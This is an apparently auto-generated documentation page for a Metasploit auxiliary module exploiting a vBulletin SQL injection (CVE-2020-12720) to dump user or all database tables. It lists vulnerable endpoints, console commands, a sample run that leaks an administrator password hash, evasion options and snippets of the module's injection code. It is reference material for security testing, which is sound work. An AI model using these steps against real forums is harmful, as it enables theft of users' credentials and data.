vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection - Metasploit
This page contains detailed information about how to use the auxiliary/gather/vbulletin_getindexablecontent_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection
Module: auxiliary/gather/vbulletin_getindexablecontent_sqli
Source code: modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
Disclosure date: 2020-03-12
Last modification time: 2021-02-24 20:24:57 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-12720
This module exploits a SQL injection vulnerability found in vBulletin 5.x.x to dump the user table information or to dump all of the vBulletin tables (based on the selected options). This module has been tested successfully on VBulletin Version 5.6.1 on Ubuntu Linux.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/vbulletin_getindexablecontent_sqli
msf auxiliary(vbulletin_getindexablecontent_sqli) > show targets
... a list of targets ...
msf auxiliary(vbulletin_getindexablecontent_sqli) > set TARGET target-id
msf auxiliary(vbulletin_getindexablecontent_sqli) > show options
... show and set options ...
msf auxiliary(vbulletin_getindexablecontent_sqli) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
vBulletin A popular PHP bulletin board and blog web application. This module has been tested successfully against vBulletin 5.6.1 running on Ubuntu Linux 19.04
Description
This module exploits a SQL injection vulnerability present in vBulletin 5.2.0 through 5.6.1 in the
getIndexableContent function. This vulnerability is triggered through the nodeId variable and
can be reached through multiple paths (listed below) but is exploited in this module utilizing the
/ajax/api/content_infraction/getIndexableContent path.
- /ajax/api/content_video/getIndexableContent
- /ajax/api/content_text/getIndexableContent
- /ajax/api/content_report/getIndexableContent
- /ajax/api/content_redirect/getIndexableContent
- /ajax/api/content_privatemessage/getIndexableContent
- /ajax/api/content_poll/getIndexableContent
- /ajax/api/content_photo/getIndexableContent
- /ajax/api/content_link/getIndexableContent
- /ajax/api/content_infraction/getIndexableContent
- /ajax/api/content_gallery/getIndexableContent
- /ajax/api/content_event/getIndexableContent
- /ajax/api/content_channel/getIndexableContent
- /ajax/api/content_attach/getIndexableContent
Each path listed above reaches the getIndexableContent function within the /core/vb/library/content.php
file. The SQL injection attack used utilizes a UNION query in order to leak data back in the response
rawtext field. The data stored on the file system contains the entire user table or a dump of all the
vBulletin tables in json format.
Verification Steps
- Do:
use auxiliary/gather/vbulletin_getindexablecontent_sqli - Do:
set RHOSTS [IP] - Do:
set VHOST [HOSTNAME] - Do:
set TARGETURI [PATH] - Do:
run
Options
NODE
A valid node id value for the vBulletin install. When provided, this value is used instead of that acquired by brute-forcing
MINNODE
A minimum nodeid value to begin with when brute-forcing for a valid node id. Default: 1
MAXNODE
A maximum nodeid value to end with when brute-forcing for a valid node id. Default: 200
TARGETURI
The base URI path of vBulletin. Default: /
Scenarios
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local
VHOST => vb.local
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI /
TARGETURI => /vb5
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
DumpAll Dump all tables used by vbulletin.
DumpUser Dump only user table used by vbulletin.
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run
[*] Running module against 192.168.1.100
[*] Brute forcing to find a valid node id.
[+] Sucessfully found node at id 1
[*] Attempting to determine the vBulletin table prefix.
[+] Sucessfully retrieved table to get prefix from vb5_language.
[*] Getting table columns for vb5_user
[+] Retrieved 78 columns for vb5_user
[*] Dumping table vb5_user
[*] Table contains 1 rows, dumping (this may take a while).
[+] Found credential: administrator:$2y$15$I5t0BGBeYaYGbaRhhBr8g.EBax846Jx3B6ady..nwuPxOWAYicYvi (Email: [email protected])
[+] Retrieved 1 rows for vb5_user
[+] Saved file to: /home/zenofex/.msf4/loot/20200522180431_default_192.168.1.100_vb5_user_305077.txt
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the gather/vbulletin_getindexablecontent_sqli auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/vbulletin_getindexablecontent_sqli
msf6 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show info
Name: vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection
Module: auxiliary/gather/vbulletin_getindexablecontent_sqli
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-03-12
Provided by:
Charles Fol <[email protected]>
Zenofex <[email protected]>
Available actions:
Name Description
---- -----------
DumpAll Dump all tables used by vbulletin.
DumpUser Dump only user table used by vbulletin.
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MAXNODE 200 yes Valid Node ID
MINNODE 1 yes Valid Node ID
NODE no Valid Node ID
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to vBulletin
VHOST no HTTP server virtual host
Description:
This module exploits a SQL injection vulnerability found in
vBulletin 5.x.x to dump the user table information or to dump all of
the vBulletin tables (based on the selected options). This module
has been tested successfully on VBulletin Version 5.6.1 on Ubuntu
Linux.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-12720
Module Options
This is a complete list of options available in the gather/vbulletin_getindexablecontent_sqli auxiliary module:
msf6 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show options
Module options (auxiliary/gather/vbulletin_getindexablecontent_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXNODE 200 yes Valid Node ID
MINNODE 1 yes Valid Node ID
NODE no Valid Node ID
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to vBulletin
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
DumpUser Dump only user table used by vbulletin.
Advanced Options
Here is a complete list of advanced options supported by the gather/vbulletin_getindexablecontent_sqli auxiliary module:
msf6 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show advanced
Module advanced options (auxiliary/gather/vbulletin_getindexablecontent_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/vbulletin_getindexablecontent_sqli module can do:
msf6 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
DumpAll Dump all tables used by vbulletin.
DumpUser Dump only user table used by vbulletin.
Evasion Options
Here is the full list of possible evasion options supported by the gather/vbulletin_getindexablecontent_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Could not determine the vBulletin table prefix.
Here is a relevant code snippet related to the "Could not determine the vBulletin table prefix." error message:
67: def get_table_prefix(node_id)
68: print_status('Attempting to determine the vBulletin table prefix.')
69: table_name = do_sqli(node_id, '', 'table_name', 'information_schema.columns', "column_name='phrasegroup_cppermission'")
70:
71: unless table_name && table_name.split('language').index
72: fail_with(Failure::Unknown, 'Could not determine the vBulletin table prefix.')
73: end
74:
75: table_prfx = table_name.split('language')[0]
76: print_good("Sucessfully retrieved table to get prefix from #{table_name}.")
77:
MINNODE can't be major than MAXNODE.
Here is a relevant code snippet related to the "MINNODE can't be major than MAXNODE." error message:
82: def brute_force_node
83: min = datastore['MINNODE']
84: max = datastore['MAXNODE']
85:
86: if min > max
87: print_error("MINNODE can't be major than MAXNODE.")
88: return nil
89: end
90:
91: for node_id in min..max
92: if exists_node?(node_id)
errors
Here is a relevant code snippet related to the "errors" error message:
105: 'vars_post' => {
106: 'nodeid' => id.to_s
107: }
108: })
109:
110: return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']
111:
112: print_good("Sucessfully found node at id #{id}")
113: true
114: end
115:
Could not get count of columns for <TABLE_PRFX><TABLE>.
Here is a relevant code snippet related to the "Could not get count of columns for <TABLE_PRFX><TABLE>." error message:
161:
162: # Get columns for table
163: def get_table_columns(node_id, table_prfx, table)
164: print_status("Getting table columns for #{table_prfx}#{table}")
165: columns_cnt = do_sqli(node_id, '', 'COUNT(COLUMN_NAME)', 'INFORMATION_SCHEMA.COLUMNS', "TABLE_NAME='#{table_prfx}#{table}'")
166: fail_with(Failure::UnexpectedReply, "Could not get count of columns for #{table_prfx}#{table}.") unless columns_cnt
167:
168: columns = []
169: for idx in 0..columns_cnt.to_i
170: column = do_sqli(node_id, '', 'COLUMN_NAME', 'INFORMATION_SCHEMA.COLUMNS', "TABLE_NAME='#{table_prfx}#{table}'", "#{idx}, #{idx + 1}")
171: columns << column
Could not get count of tables with prefix: <TABLE_PRFX>.
Here is a relevant code snippet related to the "Could not get count of tables with prefix: <TABLE_PRFX>." error message:
224:
225: # Get all tables in database with prefix
226: def get_all_tables(node_id, table_prfx)
227: print_status('Dumping all table names from INFORMATION_SCHEMA')
228: table_cnt = do_sqli(node_id, '', 'COUNT(TABLE_NAME)', 'INFORMATION_SCHEMA.TABLES', "TABLE_NAME like '#{table_prfx}%'")
229: fail_with(Failure::UnexpectedReply, "Could not get count of tables with prefix: #{table_prfx}.") unless table_cnt
230:
231: tables = []
232: for idx in 0..table_cnt.to_i
233: table = do_sqli(node_id, '', 'TABLE_NAME', 'INFORMATION_SCHEMA.TABLES', "TABLE_NAME like '#{table_prfx}%'", "#{idx}, #{idx + 1}")
234: tables << table
Could not get a valid node id for the vBulletin install.
Here is a relevant code snippet related to the "Could not get a valid node id for the vBulletin install." error message:
246:
247: # Performs all sql injection functionality
248: def run
249: # Get node_id for requests
250: node_id = get_node
251: fail_with(Failure::Unknown, 'Could not get a valid node id for the vBulletin install.') unless node_id
252:
253: # Get vBulletin table prefix (from known vb table 'language')
254: table_prfx = get_table_prefix(node_id)
255:
256: tables = action.name == 'DumpAll' ? get_all_tables(node_id, table_prfx) : ["#{table_prfx}user"]
Go back to menu.
Related Pull Requests
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13553 Merged Pull Request: PR to fix two modules for CVE-2020-12720 not properly handling vBulletin table prefixes
- #13512 Merged Pull Request: Add vbulletin_getindexablecontent SQLi to RCE exploit and auxillary gather module
References
See Also
Check also the following modules related to this module:
- exploit/multi/http/vbulletin_getindexablecontent
- auxiliary/gather/vbulletin_vote_sqli
- auxiliary/admin/http/vbulletin_upgrade_admin
- exploit/multi/http/vbulletin_unserialize
- exploit/multi/http/vbulletin_widgetconfig_rce
- exploit/multi/http/vbulletin_widget_template_rce
- exploit/unix/webapp/vbulletin_vote_sqli_exec
- exploit/unix/webapp/php_vbulletin_template
- auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
- auxiliary/sqli/openemr/openemr_sqli_dump
- auxiliary/sqli/oracle/dbms_cdc_ipublish
- auxiliary/sqli/oracle/dbms_cdc_publish
- auxiliary/sqli/oracle/dbms_cdc_publish2
- auxiliary/sqli/oracle/dbms_cdc_publish3
- auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription
- auxiliary/sqli/oracle/dbms_export_extension
- auxiliary/sqli/oracle/dbms_metadata_get_granted_xml
- auxiliary/sqli/oracle/dbms_metadata_get_xml
- auxiliary/sqli/oracle/dbms_metadata_open
- auxiliary/sqli/oracle/droptable_trigger
- auxiliary/sqli/oracle/jvm_os_code_10g
- auxiliary/sqli/oracle/jvm_os_code_11g
- auxiliary/sqli/oracle/lt_compressworkspace
- auxiliary/sqli/oracle/lt_findricset_cursor
- auxiliary/sqli/oracle/lt_mergeworkspace
- auxiliary/sqli/oracle/lt_removeworkspace
- auxiliary/sqli/oracle/lt_rollbackworkspace
Related Nessus plugins:
Authors
- Charles Fol <folcharles[at]gmail.com>
- Zenofex <zenofex[at]exploitee.rs>
Version
This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
